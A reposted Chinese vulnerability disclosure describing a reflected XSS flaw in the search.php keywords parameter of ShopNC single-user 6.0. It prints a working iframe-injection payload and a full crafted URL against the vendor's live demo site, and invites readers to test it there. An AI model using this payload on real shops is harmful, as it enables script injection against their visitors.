简要描述:自称最安全的商城系统,ShopNC 单用户程序, 通过构造特殊url,实现对ShopNC的XSS攻击.
目前最新版本6.0 存在此问题!
详细说明:Search.php页面 对search变量未进行严格过滤,
无论是否编码均执行用户url提交的脚本
比如,跨站脚本为
<iframe src=http://www.fengblog.org/ width=800 height=160 frameborder=0 ></iframe>
如图
目前可以在官方演示站进行测试
http://mall.shopnc.net
http://mall.shopnc.net/search.php?all_sun=all_sun&button=%e6%90%9c%e7%b4%a2%e7%bb%93%e6%9e%9c&end_price=&keywords=%27%22%28%29%26%251</textarea><iframe src=http://www.fengblog.org/ width=800 height=160 frameborder=0 ></iframe>&sel_goods_brand=&start_price=&txt_class_top_id=0
漏洞 证明:都在详细说明中.
修复方案:由于代码是经过Zend 加密 的,这个问题请等待厂商发布!
查看更多关于ShopNC单用户版XSS漏洞及修复方案 - 网站安全 - 自的详细内容...
声明:本文来自网络,不代表【好得很程序员自学网】立场,转载请注明出处:http://www.haodehen.cn/did11669